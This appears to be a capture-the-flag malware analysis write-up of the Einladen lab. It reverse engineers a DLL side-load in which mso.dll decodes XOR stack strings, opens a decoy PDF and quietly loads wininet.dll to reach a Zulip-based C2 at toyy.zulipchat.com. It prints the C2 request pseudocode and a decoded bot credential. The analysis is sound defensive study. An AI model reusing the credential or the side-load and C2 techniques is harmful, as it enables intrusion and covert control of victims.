Einladen mso.dll Reverse Engineering
In the Einladen Sherlock, there’s an HTA file that drops a legitimate Microsoft-signed executable, two DLLs, and a PDF. I was able to use the PCAP and Procmon data to figure out where to go next without reverse engineering the malware. In the embedded YouTube video, I’ll dive into the DLL side-load, how the binary secretly loads wininet.dll, decrypts stack strings, and contacts the C2, with a summary of the analysis in this post.
Overview
Situation
In the Einladen Sherlock, I’ll work through the following malware artifacts:
flowchart TD;
A[<a href="/2024/05/02/htb-sherlock-einladen.html#downloaderhtml">downloader.html</a>]-->B[<a href="/2024/05/02/htb-sherlock-einladen.html#invitation_farewell_de_embzip">Invitation_Farewell_DE_EMB.zip</a>];
B-->C[<a href="/2024/05/02/htb-sherlock-einladen.html#invitation_farewell_de_embhta">Invitation_Farewell_DE_EMB.hta</a>];
C-->D[<a href='/2024/05/02/htb-sherlock-einladen.html#pdf'>Invitation.pdf</a>];
C-->E;
C-->F;
C-->G;
subgraph malware[" "]
E[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#msoevexe">msoev.exe</a>];
F[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#msodll">mso.dll</a>];
G[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#appvisvsubsystems64dll">AppVIsvSubsystems64.dll</a>];
H[<a href="/2024/05/02/htb-sherlock-einladen.html#pcap">msoev.pcapng</a>];
I[<a href="/2024/05/02/htb-sherlock-einladen.html#procmon-logs">Logfile.PML</a>];
end
E-. ? .->J[<a href="/2024/05/02/htb-sherlock-einladen.html#uncjs">unc.js</a>];
J-->K[<a href="/2024/05/02/htb-sherlock-einladen.html#bat-file-analysis">richpear.bat</a>];
K-->L[<a href="/2024/05/02/htb-sherlock-einladen.html#empireclientexe">EmpireClient.exe</a>];
M[sheet.hta];
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 6 stroke-width:2px,stroke:#FFFF99,fill:none;
style malware fill:#666;
A malicious HTA file dropped a legitimate Microsoft-signed executable, msoev.exe, as well as two DLLs to disk and ran the EXE, executing a DLL side-loading attack to run the malware from one of the DLLs. In solving, I’ll use PCAP collection and Procmon logs collected while running the malware to conclude that the malware is using the Zulip chat service as C2, connecting to toyy.zulipchat.com.
It was not necessary to reverse engineer the malware at all. Still, it’s interesting to do, so I’ll take a quick look at it here.
Video Analysis
Most of the analysis will be done in this video:
msoev.exe
Purpose
msoev.exe, according to spyshelter.com, is:
a process made by Microsoft itself to collect Telemetry information for the Microsoft Office software. The Telemetry helps Microsoft fix issues, and improve the Office software, like Word, Excel, or Outlook.
Strings in the binary match up with that:
Imports
It’s not worth doing a detailed analysis of the signed Microsoft binary, but it is worth understanding its imports, especially those related to the two DLLs dropped with it by the phishing HTA. I’ll open it in Ghidra and take a look:
Most of these will be installed on Windows by default, but the two that drop with it are likely binaries that come when msoev.exe gets installed. The malware only needs one of these to get loaded to run its malicious code, but both need to be present to keep the binary from erroring.
AppVIsvSubsystems64.dll
Overview
Of the two DLLs dropped, AppVIsvSubsystems64.dll is the uninteresting one. It’s actually a bit surprising that it scores so poorly on VirusTotal, as it doesn’t really do anything at all, let alone anything malicious:
It shows that AV engines are detecting this because it’s a part of this DLL side-loading attack, not because it does anything wrong.
Reverse Engineering
I’ll open AppVIsvSubsystems64.dll in Ghidra to take a look. It has two exports, and they are the only two functions:
Above, msoev.exe called ordinal_1 from this DLL. Ghidra has a comment labeling APIExportForDetours as ordinal_1:
This function does exactly nothing:
void APIExportForDetours(void)
{
                    /* 0x1010  1  APIExportForDetours
                       0x1010  2  CurrentThreadIsVirtualized
                       0x1010  3  IsProcessHooked
                       0x1010  4  RequestUnhookedFunctionList
                       0x1010  5  VirtualizeCurrentProcess
                       0x1010  6  VirtualizeCurrentThread */
  return;
}
The entry function is just as simple, returning 1:
int entry(void)
{
  return 1;
}
This binary exists only to keep msoev.exe from erroring. It does nothing else.
mso.dll
Overview
Exports
The exports of mso.dll pretty much line up with what is called by msoev.exe:
CommandLineToArgvWTT is ordinal_1777:
That makes it the function that is called by msoev.exe. I started taking a look at this function, but it will make more sense to come back to it later.
Imports
I’ll also look at what’s imported. The one that jumps out as most interesting is ShellExecuteA:
The rest of the imports aren’t that interesting.
Strings
Looking at the strings in mso.dll, there’s one that jumps out to me as interesting:
There are other .dll strings, but this one isn’t in the imports. Why would the binary need a string naming a DLL that it isn’t importing? It likely means the binary will load that DLL some other way at runtime to get access to its functions (in this case network functions) without advertising that in the import table.
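One way to spot this kind of mismatch quickly is to compare the DLL names that show up in the strings against the DLL names in the import table. The sketch below is a minimal illustration of that idea. The helper name `unimported_dll_strings` and both sample lists are hypothetical, made up for the example rather than dumped from mso.dll:

```python
import re

# Matches strings that look like a bare DLL file name, e.g. "wininet.dll"
DLL_NAME = re.compile(r"^[\w.-]+\.dll$", re.IGNORECASE)


def unimported_dll_strings(strings, imported_dlls):
    """Return DLL-looking strings that are absent from the import table."""
    imported = {name.lower() for name in imported_dlls}
    candidates = {s.lower() for s in strings if DLL_NAME.match(s)}
    return sorted(candidates - imported)


# Hypothetical sample data, for illustration only
sample_strings = ["KERNEL32.dll", "SHELL32.dll", "wininet.dll", "Unknown error"]
sample_imports = ["kernel32.dll", "shell32.dll"]

suspicious = unimported_dll_strings(sample_strings, sample_imports)
print(suspicious)
```

In practice the two input lists would come from a strings dump and from the import table as shown by a tool like Ghidra.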
Open Dummy
ShellExecuteA
Seeing that the DLL imports ShellExecuteA, I’ll take a look at where that’s used, in FUN_2ac403110:
bool FUN_2ac403110(void)
{
  LPCSTR lpFile;
  LPCSTR lpOperation;
  HINSTANCE pHVar1;
  undefined4 local_2f;
  undefined2 local_2b;
  undefined local_29;
  undefined8 local_28;
  undefined8 local_20;
  undefined local_18;

  local_28 = 0x667b6e7b66796146;
  local_20 = 0xf696b7f216160;
  local_18 = 0xf;
  /* Decodes to "Invitation.pdf" */
  lpFile = (LPCSTR)FUN_2ac406170((byte *)&local_28);
  local_29 = 5;
  local_2f = 0x6b60756a;
  local_2b = 5;
  /* Decodes to "open" */
  lpOperation = (LPCSTR)FUN_2ac4063b0((byte *)&local_2f);
  pHVar1 = ShellExecuteA((HWND)0x0,lpOperation,lpFile,(LPCSTR)0x0,(LPCSTR)0x0,1);
  return 0x20 < (int)pHVar1;
}
ShellExecuteA takes an operation and a file, each of which is decoded here by a custom XOR function (FUN_2ac4063b0 for the operation, FUN_2ac406170 for the file). So this call is ShellExecuteA(NULL, "open", "Invitation.pdf", NULL, NULL, 1), responsible for opening the decoy document. The idea here is that when the user double-clicks on the HTA file, it writes these binaries, and then this binary opens a PDF, so the user thinks that’s all that’s happened.
XOR Decrypt Functions
The binary uses tons of these custom XOR functions. They all check that the byte at some offset is null, and then XOR the bytes up to that offset with the byte after the null. For example, FUN_2ac406170:
void FUN_2ac406170(byte *param_1)
{
  byte *pbVar1;

  if (param_1[0xf] == 0) {
    pbVar1 = param_1;
    do {
      *pbVar1 = *pbVar1 ^ param_1[0x10];
      pbVar1 = pbVar1 + 1;
    } while (pbVar1 != param_1 + 0xf);
    param_1[0xf] = 1;
  }
  return;
}
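This one makes sure the byte at offset 15 is null, then XORs the bytes at offsets 0-14 with the value at offset 16, and finally sets offset 15 to 1 so the string isn’t decoded a second time.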
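To make the memory layout concrete, here is a small Python sketch that mimics the routine on a byte buffer built from the stack locals in FUN_2ac403110. The helper name `xor_decode_in_place` is mine, and the second call assumes FUN_2ac4063b0 follows the same pattern with a 5-byte string, which is inferred from the locals rather than from its decompilation:

```python
import struct


def xor_decode_in_place(buf, length=0xF):
    """Mimic FUN_2ac406170: XOR buf[0:length] with the key stored at buf[length + 1]."""
    if buf[length] == 0:          # flag byte: 0 means "not decoded yet"
        key = buf[length + 1]
        for i in range(length):
            buf[i] ^= key
        buf[length] = 1           # mark as decoded so a second call is a no-op
    return buf


# local_28, local_20 and local_18 as they sit contiguously on the stack (little-endian)
stack = bytearray(struct.pack("<QQB", 0x667B6E7B66796146, 0x000F696B7F216160, 0x0F))
file_name = xor_decode_in_place(stack).split(b"\x00")[0].decode()

# Assumption: FUN_2ac4063b0 is the same routine with length 5 (local_2f, local_2b, local_29)
stack = bytearray(struct.pack("<IHB", 0x6B60756A, 0x0005, 0x05))
operation = xor_decode_in_place(stack, length=5).split(b"\x00")[0].decode()

print(file_name, operation)
```

The last encoded byte equals the key, so it decodes to the null terminator, which is why splitting on the first null recovers the string.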
To make my life a bit easier, I’ll write a quick Python script that will pull the stack strings and decode them:
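#!/usr/bin/env python3
import sys


def decode_word(word, key):
    # Stack words are little-endian: pad to whole bytes, then reverse
    if len(word) % 2:
        word = '0' + word
    data = bytes.fromhex(word)[::-1]
    return ''.join(chr(b ^ key) for b in data)


key = int(sys.argv[-1], 16)
result = ''
for blob in sys.argv[1:-1]:
    # removeprefix (Python 3.9+) drops only a literal "0x", unlike lstrip('0x')
    result += decode_word(blob.removeprefix('0x'), key)
# Drop the decoded null terminator
print(result.rstrip('\x00'))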
I can run this with the stack words and the key and get the result:
oxdf@hacky$ python decode.py 667b6e7b66796146 0f696b7f216160 f
Invitation.pdf
Internet Activity
There’s a string, wininet.dll, in the strings in this binary, but it’s not referenced as an import. Jumping to where it’s used, I’ll find FUN_2ac402f20. At the top it has another similarly obfuscated string that decodes to LdrLoadDll, which according to malapi.io is “used instead of LoadLibrary to load modules”:
It seems this function is loading wininet.dll.
Stepping up to where FUN_2ac402f20 is called in FUN_2ac4031a0, the result is checked and passed to FUN_2ac402b90:
Stepping into FUN_2ac402b90, there are a bunch more encoded strings. Each is passed to a function to decode it, and then the result is passed to FUN_2ac4018f0 along with param1, which is the wininit_module, with the result being stored in global variables:
I’ve renamed these globals to be the decoded strings.
I’ll look for references to these globals, and each one has two:
The first reference is a “WRITE”, which is what I was just looking at. Jumping to the “READ”, all of them land in FUN_2ac401dc0, which has a bunch more strings to decode and uses the resolved functions:
This function ends up as the following pseudocode:
hinternet = InternetOpenA("Curl/7.68.0", 0, 0, 0, 0)
hsession = InternetConnectA(hinternet, "toyy.zulipchat.com", 443, 0, 0, 0, INTERNET_SERVICE_HTTP, 0, 1)
hrequest = HttpOpenRequestA(hsession, param1, param2, 0, 0, 0, 0x44c03100, 1)
successful = HttpSendRequestA(hrequest, headers, len(headers), param3, param4)
InternetReadFile(hrequest, global_buffer, 0x100000, bytes_read_buffer)
The flags for HttpOpenRequestA, 0x44c03100, are interesting, and as defined here break down to:
- 0x40000000: INTERNET_FLAG_RAW_DATA
- 0x04000000: INTERNET_FLAG_DONT_CACHE
- 0x00800000: INTERNET_FLAG_SECURE
- 0x00400000: INTERNET_FLAG_KEEP_CONNECTION
- 0x00002000: INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
- 0x00001000: INTERNET_FLAG_IGNORE_CERT_CN_INVALID
- 0x00000100: INTERNET_FLAG_PRAGMA_NOCACHE
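The breakdown above can be double-checked with a few lines of Python. This is just a sketch: the `WININET_FLAGS` table holds only the seven flags named in this post, not the full WinINet set, and `decode_flags` is a helper name I made up:

```python
# Only the flags named in this post, not the complete WinINet flag list
WININET_FLAGS = {
    0x40000000: "INTERNET_FLAG_RAW_DATA",
    0x04000000: "INTERNET_FLAG_DONT_CACHE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


def decode_flags(value):
    """Return the matching flag names plus any bits the table does not cover."""
    names = [name for bit, name in WININET_FLAGS.items() if value & bit]
    leftover = value & ~sum(WININET_FLAGS)
    return names, leftover


names, leftover = decode_flags(0x44C03100)
for name in names:
    print(name)
print(f"unaccounted bits: {leftover:#x}")
```

A leftover of zero means the seven flags account for every bit set in 0x44c03100.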
The headers from HttpSendRequestA are also interesting:
Content-Type: application/x-www-form-urlencoded
Authorization: Basic Z2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6
The Basic auth decodes to a username and password:
oxdf@hacky$ echo "Z2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6" | base64 -d
gabs-bot@toyy.zulipchat.com:xJZf8jaqwX54HWaliXfm4u2bMWCzNoLz
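The same decode can be done in Python, which is handy when pulling credentials out of many captured headers. This is a minimal sketch, and `parse_basic_auth` is a hypothetical helper name. It splits on the first colon only, since a Basic auth password may itself contain colons:

```python
import base64


def parse_basic_auth(header_value):
    """Split an 'Authorization: Basic ...' value into (user, password)."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic Authorization header")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


header = "Basic Z2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6"
user, password = parse_basic_auth(header)
print(user)
print(password)
```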